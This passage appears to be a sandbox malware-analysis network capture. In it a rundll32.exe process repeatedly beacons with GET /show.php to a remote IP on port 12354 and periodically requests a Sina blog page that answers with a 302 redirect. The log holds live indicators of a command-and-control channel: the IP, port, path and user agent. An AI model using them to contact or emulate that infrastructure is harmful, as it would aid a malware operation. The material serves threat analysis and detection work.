Dec 11, 2024 16:27:33.704071045 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:27:33 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	50002	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:32.139697075 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	50026	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:34.249517918 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	50029	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:34.381196022 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	50048	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:36.017565012 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	50051	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:36.131002903 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	50052	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:36.160609961 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Dec 11, 2024 16:27:37.734524965 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:27:37 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	50076	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:38.248204947 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	50079	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:38.393419981 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	50097	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:40.039273024 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	50099	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:40.145740986 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	50100	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:40.183289051 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Dec 11, 2024 16:27:41.755991936 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:27:41 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	50126	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:42.265783072 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	50128	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:42.405708075 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	50148	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:44.050100088 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	50150	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:44.195864916 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Dec 11, 2024 16:27:45.779295921 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:27:45 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	50151	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:44.196326971 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	50177	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:46.281640053 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	50179	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:46.425981045 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	50203	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:48.174108982 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	50205	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:48.414263964 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	50206	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:48.414283991 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Dec 11, 2024 16:27:49.984549999 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:27:49 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.7	50233	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:50.404706955 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.7	50237	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:50.716801882 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.7	50247	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:52.382196903 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.7	50255	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:52.748363972 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.7	50260	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:53.243506908 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Dec 11, 2024 16:27:54.817440033 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:27:54 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.7	50279	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:54.615418911 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.7	50285	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:54.991259098 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.7	50293	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:56.477699041 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.7	50294	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:56.543292046 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Dec 11, 2024 16:27:58.102708101 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:27:57 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.7	50296	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:56.592231989 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.7	50326	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:58.942759037 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.7	50328	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:27:59.765985012 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.7	50339	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:00.507483959 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.7	50341	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:00.674978018 CET	214	OUT	GET /u/5655029807 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Cookie: U_TRS1=0000001a.75778b75.6759af62.562cf2cd; U_TRS2=0000001a.75808b75.6759af62.10b83b67
Dec 11, 2024 16:28:02.246408939 CET	371	IN	HTTP/1.1 302 Moved Temporarily Server: nginx/1.2.8 Date: Wed, 11 Dec 2024 15:28:01 GMT Content-Type: text/html Content-Length: 160 Connection: keep-alive Location: https://blog.sina.com.cn/u/5655029807 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.7	50342	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:00.677692890 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.7	50371	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:03.335738897 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.7	50372	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:03.696115971 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.7	50390	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:04.645664930 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.7	50393	107.163.241.232	12354	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 16:28:04.811268091 CET	184	OUT	GET /show.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.241.232:12354 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.7	50394	202.108.0.52	80	7292	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
